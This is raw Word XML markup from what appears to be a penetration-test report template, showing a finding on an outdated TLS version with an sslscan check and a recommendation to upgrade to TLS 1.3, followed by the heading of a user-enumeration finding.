                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6F096908">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t xml:space="preserve"> Downgrade Attack</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3F43EBAB">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0BA28CA6"/>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386E1FC6" w:rsidP="0D325B6E" w:rsidRDefault="386E1FC6" w14:paraId="65607F5F" w14:textId="500436EE">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386E1FC6">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477951E" w:rsidP="0D325B6E" w:rsidRDefault="6477951E" w14:paraId="4D0B09E6" w14:textId="43C932B6">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rb23d69d2c7cd4ad5">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6477951E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>M1051</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0E2CCFFA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6477951E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t xml:space="preserve"> Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="22F9DA28">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2C8ACC" w14:textId="438A578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468A211" w14:textId="454D80FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="10F8266D" w14:textId="60F7EA26">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>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56CCB454" w:rsidP="0D325B6E" w:rsidRDefault="56CCB454" w14:paraId="3484BC29" w14:textId="0C32EAC2">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CCB454">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1268EC59" w:rsidP="0D325B6E" w:rsidRDefault="1268EC59" w14:paraId="66C62AA7" w14:textId="501AE499">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68EC59">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6AA9AC64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">installed </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6AA9AC64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6AA9AC64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> version used in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6AA9AC64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APPLICATION</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6AA9AC6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 xml:space="preserve">has an </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outdated</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 xml:space="preserve"> version</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4759ED20">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0E4A7900">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</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1B34382F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> latest TLS version </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="667AFCF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is 1.3, w</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A1C8737">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hile the application uses TLS </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A1C8737">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VERSION</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77084878">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. An attacker can potentially exploit this</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="330B657A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> outdated version, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="330B657A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possibly in</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="330B657A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> combination with other exploits, to gain access to information or systems that they should not be able to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="21B463E3" w14:textId="263BC70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6CCB454" w:rsidP="0D325B6E" w:rsidRDefault="56CCB454" w14:paraId="131F8B4D" w14:textId="4B2DF92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CCB454">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8463FB6" w:rsidP="0D325B6E" w:rsidRDefault="78463FB6" w14:paraId="56E9AF3B" w14:textId="56C6A35F">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8463FB6">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could potentially </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="733C3A08">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit an outdated TLS version to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77306588">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">carry out a downgrade attack or other similar exploits, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25176E53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which could allow decryption of traffic. Traffic decryption </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2FC63E44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows for</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25176E53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reading information such as passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60F29348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in plaintext, which can cause severe security issues. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6395C99C" w14:textId="41C3EA5F">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6CCB454" w:rsidP="0D325B6E" w:rsidRDefault="56CCB454" w14:paraId="5DA3780D" w14:textId="4838A6E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CCB454">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DB14F9D" w:rsidP="0D325B6E" w:rsidRDefault="6DB14F9D" w14:paraId="22EB8231" w14:textId="44490D8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 xml:space="preserve">Step 1: Use </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sslscan</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 xml:space="preserve"> to check the TLS </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versio</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 xml:space="preserve">n. </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sslscan</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DB14F9D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="00A5AE7E" w14:textId="4E7B16C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6CCB454" w:rsidP="0D325B6E" w:rsidRDefault="56CCB454" w14:paraId="5C65295D" w14:textId="69FE5CE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CCB454">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7FB90F1C" w:rsidP="0D325B6E" w:rsidRDefault="7FB90F1C" w14:paraId="185021C3" w14:textId="4C96EFC4">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FB90F1C">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2BF97E7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5A90D048">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6B7D5B1A" w:rsidP="0D325B6E" w:rsidRDefault="6B7D5B1A" w14:paraId="1F41BFE8" w14:textId="3D41B262">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>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B7D5B1A">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0A3BD63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35BD490E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">configurations to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="72A1B5F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">support the newest TLS version </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6976AF1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="72A1B5F0">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1C8F74F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLSv1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="16748640" w14:textId="0966C528">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>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56CCB454" w:rsidP="0D325B6E" w:rsidRDefault="56CCB454" w14:paraId="4ADE4755" w14:textId="7529FF67">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6CCB454">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398E637" w:rsidP="0D325B6E" w:rsidRDefault="0398E637" w14:paraId="2712C25B" w14:textId="7B5EBA83">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R249a965cbdff48e1">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0398E637">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Solving the TLS1 problem</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1D95D50F" w:rsidP="0D325B6E" w:rsidRDefault="1D95D50F" w14:paraId="0B3C4698" w14:textId="09827828">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R0ab65b4104784158">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1D95D50F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Trace Security - Disabling deprecated TLS protocols</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="26A6FD47" w14:textId="6084DBF8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4D3F8FFA" w14:textId="343F212E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4E8288B8" w14:textId="08915AA3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="62294AAD" w14:textId="43565F70">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F8052EE" w:rsidP="0D325B6E" w:rsidRDefault="2F8052EE" w14:paraId="3B96936C" w14:textId="7896F428">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1748171014" w:id="8960523"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2F8052EE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2F8052EE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2F8052EE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71919668">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User Enumeration Through Failed Login</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8960523"/>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20137994">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781202" w14:textId="7871627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D051A5" w14:textId="1FFBC55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1E94B8" w14:textId="677D672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C86359C">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61678B9" w14:textId="2B5AB96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4758AEC4" w14:textId="7EA8683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3CB75B3B" w14:textId="549B744C">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53B942ED" w14:textId="7DEE179C">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7EA7DE25">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6BD9F70" w14:textId="4954B0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41414C" w:rsidP="0D325B6E" w:rsidRDefault="0A41414C" w14:paraId="40C44DFF" w14:textId="7A164BBD">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
